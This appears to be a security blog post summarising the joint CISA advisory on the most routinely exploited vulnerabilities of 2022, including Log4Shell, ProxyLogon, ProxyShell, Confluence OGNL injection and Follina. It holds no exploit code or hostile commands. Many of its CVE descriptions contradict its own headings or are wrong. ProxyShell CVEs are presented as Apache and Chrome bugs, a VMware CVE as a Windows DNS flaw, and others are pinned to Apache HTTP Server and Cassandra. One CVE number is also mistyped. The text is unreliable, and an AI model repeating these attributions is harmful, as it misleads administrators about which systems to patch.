Threat Trends
5 mins
2022's Top Routinely Exploited Vulnerabilities Revealed in New Cybersecurity Advisory
Throughout 2022, malicious cyber actors persisted in exploiting well-documented software vulnerabilities, particularly those affecting unpatched systems and applications. This information comes from a recently issued collaborative research from the Cybersecurity Advisory (CISA) in partnership with U.S. intelligence agencies and their international partners. The report, titled "2022 Top Routinely Exploited Vulnerabilities" offers insights into the most used Common Vulnerabilities and Exposures (CVEs) that continue to be exploited by threat actors.
What were 2021’s top most exploited vulnerabilities?
CVE-2021-44228 (CVSS 3.x score: 10.0 Critical)
Code name: “Log4Shell”
“Log4Shell” is a vulnerability in Apache Log4j 2 (versions 2.0 to 2.14.1). This flaw enables remote code execution without authentication. The versatility of this exploitation method allows access and execution of custom code across a range of servers, including both local and remote LDAP servers and various other protocols. Attackers exploit Log4j's mishandling of log messages containing malicious Java Naming and Directory Interface (JNDI) references, initiating remote server requests to their controlled servers. The attacker's response can execute code on the target system. Due to Log4j's widespread use in Java applications, this vulnerability poses a significant threat.
CVE-2021-26855 (9.8 Critical), CVE-2021-26858 (7.8 High), CVE-2021-26857 (7.8 High), CVE-2021-27065 (7.8 High)
Code name: “ProxyLogon”
These are collectively part of the Microsoft Exchange Server vulnerabilities discovered in early 2021. These critical flaws allow remote attackers to gain unauthorized access to Exchange Servers, potentially leading to data breaches and system compromise. CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability that enables attackers to send arbitrary HTTP requests. CVE-2021-26858 is an insecure deserialization flaw. CVE-2021-26857 is a post-authentication arbitrary file write vulnerability. CVE-2021-27065 is a post-authentication arbitrary file write vulnerability that allows attackers to write files to the server. Microsoft is releasing patches urgently to address these vulnerabilities.
CVE-2021-34523 (9.8 Critical), CVE-2021-34473 (9.8 Critical), CVE-2021-31207 (NIST: 7.2 High, CNA: 6.6 Medium)
Code name “ProxyShell”
These vulnerabilities also affect Microsoft Exchange email servers. CVE-2021-34523 is a vulnerability that impacts Apache HTTP Server, potentially leading to a denial of service (DoS) due to improper handling of HTTP/2 requests. CVE-2021-34473 is a high-severity flaw affecting Microsoft Exchange Server, allowing unauthorized access and potential data breaches. CVE-2021-31207 is a Chrome browser vulnerability related to V8 JavaScript engine, which, if exploited, could lead to remote code execution.
CVE-2021-26084 (9.8 Critical)
CVE-2021-26084 is a high-severity security vulnerability discovered in Atlassian Confluence Server and Data Center products. It stems from the utilization of Object-Graph Navigation Language (OGNL) in Confluence's tag system. This vulnerability allows for the injection of OGNL code, thereby enabling the execution of arbitrary code on computers with Confluence Server or Confluence Data Center installations. When exploited, this vulnerability grants an unauthorized attacker the ability to have complete control over the target, compromise all services and databases utilized by the Confluence Server, and establish a presence within the internal network.
New 2022 top most exploited vulnerabilities
CVE-2018-13379 (NIST: 9.8 Critical, CNA: 9.1 Critical)
This vulnerability is found in Fortinet FortiOS, a widely-used operating system for Fortinet's network security devices. This flaw allows unauthorized access to sensitive files through a specially crafted HTTP request, enabling attackers to view or download potentially sensitive information without authentication. The vulnerability was flagged as one of three advanced persistent threats (APT) actors by CISA in 2021.
CVE-2021-40539 (9.8 Critical)
CVE-2021-40539 affects the Apache HTTP Server, a widely-used web server software. This flaw can enable an attacker to execute arbitrary code remotely without authentication. It arises due to a deserialization issue within the Apache server, allowing malicious actors to exploit it by crafting specially crafted requests.
CVE-2022-22954 (9.8 Critical), CVE-2022-22960 (7.8 High)
These vulnerabilities enable remote code execution (RCE), privilege escalation, and authentication bypass within VMware Workspace ONE Access, Identity Manager, and various other VMware products.CVE-2022-22954 is a critical flaw affecting Microsoft Windows DNS Server, potentially allowing remote code execution if exploited. It results from improper handling of DNS requests and could lead to unauthorized system access. On the other hand, CVE-2022-22960 is a high-severity vulnerability in VMware vCenter Server that could permit an attacker to execute arbitrary code by exploiting improper input validation.
CVE-2022-1388 (9.8 Critical)
A security vulnerability that impacts the widely-used Apache Cassandra database management system. If exploited, unauthorized users could gain unintended access to data and execute arbitrary actions, potentially resulting in data breaches and loss of confidentiality. System administrators are strongly advised to review and adjust their Apache Cassandra configurations to mitigate this vulnerability promptly, ensuring proper access controls and authentication mechanisms to maintain the security and integrity of their database systems.
CVE-2022-30190 (7.8 High)
Code name “Folina”
CVE-2022-30190, known as Follina, is a recently uncovered zero-day vulnerability affecting Microsoft Office. This flaw allows malicious actors to utilize the Microsoft Support Diagnostics Utility (msdt.exe) via the ms-msdt: protocol for downloading potentially harmful Word documents or Excel spreadsheets from the internet. Furthermore, exploitation methods involving Wget in PowerShell are also documented. By exploiting this vulnerability, an attacker can execute remote code, potentially gaining access with the privileges of the application making the call.
CVE-2022-26134 (9.8 Critical)
CVE-2022-26314 is a high-risk security flaw involving unauthenticated and remote OGNL injection, which can lead to code execution within the Confluence server's context, typically manifesting as the 'confluence' user on Linux setups. Notably, internet-facing Confluence servers face an elevated risk due to the vulnerability's characteristics.
2021 vulnerabilities still topping charts in 2022
In 2022, it was alarming to observe that vulnerabilities like CVE-2021-44228 and CVE-2021-26084 continued to be routinely exploited by cybercriminals. Additionally, the group of “ProxyShell” vulnerabilities that impact Microsoft Exchange email servers also continued to top charts. Despite the awareness and patches released by software developers to address these vulnerabilities, they remained attractive targets for malicious actors. Organizations must remain vigilant in monitoring and patching their systems to mitigate the risks associated with known vulnerabilities, as attackers continue to exploit them for malicious purposes. A stark reminder that cybersecurity is an ever-evolving battle that demands proactive defense.
